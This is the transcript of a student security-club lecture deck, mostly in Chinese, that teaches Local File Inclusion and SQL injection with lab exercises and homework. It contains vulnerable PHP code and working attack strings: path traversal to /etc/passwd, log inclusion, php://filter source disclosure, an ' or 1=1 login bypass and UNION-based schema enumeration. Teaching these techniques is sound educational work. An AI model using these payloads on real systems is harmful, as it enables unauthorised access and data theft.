ITAC | Websec 3

Transcript

1. Web Security Racterub @ ITAC

2. •元智大學 電通英專大二 •常用 ID：Racterub / Racter •2017-2019 AIS3 學員 •2019

   台灣好厲駭 學員 •2020 ⺠生物聯網漏洞挖掘競賽 第二期第三名 •2020 Zyxel 榮耀資戰 第三名 About Me

3. • LFI • SQL injection ⽬錄

4. LFI Local File Inclusion

5. HOW PHP works?

6. • 可以讀取主機上的任意檔案，也可以執行任意 PHP 檔案 • 可以透過 PHP 的特別協定取得 source code

   • 危害程度非常大 • 有一定的機率可以直接取得 RCE LFI

7. LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else {

   @include("base.php"); }

8. LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else {

   @include("base.php"); } ?p=base.php

9. LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else {

   @include("base.php"); } ?p=!../!../!../!../!../!../!../!../!../!../etc/passwd

10. LFI if (isset($_GET['p']) !&& !empty($_GET['p'])) { @include($_GET['p']); } else {

    @include("base.php"); } ?p=!../!../!../!../!../!../var/log/nginx/access.log

11. 為什麼是 access.log？

12. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" IP 來源

13. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" 時間

14. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" HTTP 請求方式

15. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" 請求資源

16. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" HTTP 版本

17. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" HTTP 狀態碼

18. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" 回應大小

19. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" Referer: HTTP參照位址

20. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" User-Agent: 使用者代理

21. LFI 172.25.0.1 - - [23/Oct/2020:07:58:46 +0000] "GET /test HTTP/1.0" 200

    1373 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/ 537.36 (KHTML, like Gecko) Chrome/86.0.4240.80 Safari/537.36" User-Agent: 使用者代理

22. LFI php:!//

23. • Filters • String Filters • Conversion Filters • Compression

    Filters • Encryption Filters LFI

24. • String Filters • string.rot13 • string.toupper • string.tolower •

    string.strip_tags (在 v7.3.0 已被棄⽤) Filters

25. • Conversion Filters • convert.base64-encode • convert.base64-decode • convert.iconv.* Filters

26. • Compression Filters • zlib.deflate • zlib.inflate • bzip2.compress •

    bzip2.decompress Filters

27. LFI php:!//filter/resource=index.php

28. LFI php:!//filter/convert.base64-encode/ resource=index.php

29. Lab Web3 LFI

30. SQL Injection

31. 先說 SQL injection 拜託不要在學網練習 宿網也不要

32. 社課打到的機器都有特 別設定過

33. 不要隨便從學網打其他 網站ㄛ

34. SQL id username password 1 test test 2 admin 1234

    3 yzu yz1234 4 itac itac id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac Login users admins

35. SQL id username password 1 test test 2 admin 1234

    3 yzu yz1234 4 itac itac

36. SQL SELECT * FROM users ; id username password 1

    test test 2 admin 1234 3 yzu yz1234 4 itac itac

37. SQL SELECT * FROM users WHERE username='admin' ; id username

    password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

38. SQL SELECT id, password FROM users WHERE username='admin' ; id

    username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

39. SQL SELECT * FROM users LIMIT 0,1; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

40. SQL SELECT * FROM users LIMIT 1,3; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

41. SQL injection if (isset($_GET['user']) || isset($_GET['pass'])) { $sql = "SELECT

    id FROM user WHERE username='". $_GET['user']."' AND password='".$_GET['pass']."'"; $result = $connection->query($sql); if ($result) { $data = $result->fetch(PDO::FETCH_ASSOC); if ($data) { die("success"); } else { die(“failed"); } } else { die("error"); } }

42. SQL injection SELECT id FROM user WHERE username='".$_GET['user']."' AND password='".$_GET['pass']."'";

43. SQL injection SELECT id FROM user WHERE username='admin' AND password='admin';

    user = admin pass = admin

44. SQL injection SELECT id FROM user WHERE username='' or 1=1

    -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

45. SQL injection SELECT id FROM user WHERE username='' or 1=1

    -- ' AND password='admin'; user = ' or 1=1 --+ pass = admin

46. 所以 SQL injection 通常出 現在 SQL 語法拼接作查詢

47. Lab Web3 Login as admin

48. • Union-based • 做合併查詢，可以替換掉原本要查詢的位置，在網頁取 得你構造的 SQL 語法所拿的資料 • Boolean-based •

    當你在猜字時，可以透過 ASCII 來比較，用 True / False 撈資料 • Time-based • 可以使用 Boolean-based 的方式然後在多去 sleep 一下 SQL injection 種類

49. SQL SELECT * FROM users WHERE id=1; id username password

    1 test test 2 admin 1234 3 yzu yz1234 4 itac itac

50. SQL SELECT * FROM users WHERE id=1 UNION SELECT 1,2,3;

    id username password 1 test test 2 admin 1234 3 yzu yz1234 4 itac itac 1 2 3

51. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,2,3;

    id username password 1 2 3

52. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,user(),3;

    id username password 1 root@localhost 3

53. • information_schema MySQL

54. • information_schema • 存有資料庫的中繼資料 MySQL

55. • information_schema • 存有資料庫的中繼資料 • Database Name • Table Name

    • Column Name MySQL

56. • Database Name • information_schema.schemata • Table Name • information_schema.tables

    • Column Name • information_schema.columns MySQL

57. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,schema_name,3

    FROM information_schema.schemata; id username password 1 login 3

58. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,table_name,3

    FROM information_schema.tables WHERE table_schema='login'; id username password 1 users 3

59. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3

    FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3

60. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,column_name,3

    FROM information_schema.columns WHERE table_name='users' limit 1,1; id username password 1 username 3

61. SQL SELECT * FROM users WHERE id=-1 UNION SELECT 1,group_concat(column_name),3

    FROM information_schema.columns WHERE table_name='users'; id username password 1 id 3

62. 作業 Web3 Blog

63. 作業 Web3 Login as admin - advanced

64. 作業 Web3